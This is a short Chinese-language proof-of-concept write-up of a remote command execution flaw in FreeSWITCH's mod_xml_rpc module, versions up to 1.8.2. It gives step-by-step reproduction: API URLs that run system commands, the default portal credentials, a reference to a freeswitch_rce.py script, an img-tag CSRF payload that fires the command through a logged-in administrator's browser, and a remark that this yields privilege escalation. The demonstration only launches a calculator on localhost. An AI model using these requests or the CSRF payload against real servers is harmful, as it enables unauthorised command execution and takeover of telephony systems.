version:<=1.8.2
module:mod_xml_rpc
我总共测试了三个版本。(下载地址:http://files.freeswitch.org/)
安装 freeswitch 1.5.15 Windows 版本(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
打开控制台并输入:load mod_xml_rpc (加载 freeswitch 门户)
访问本地端口 8080,
http://127.0.0.1:8080/portal/index.html
在控制台输入
api("system calc")或api("bg_system calc")

也可以直接请求接口
http://127.0.0.1:8080/txtapi/system?calc 或
http://127.0.0.1:8080/api/system?calc



freeswitch 门户的默认账号和密码为 freeswitch:works
你可以自行使用 freeswitch_rce.py 进行验证
或者使用 csrf 攻击已登录的管理员。
<img src="http://127.0.0.1:8080/api/system?calc">

由于 freeswitch 通常以高权限运行,因此也可以实现权限提升的效果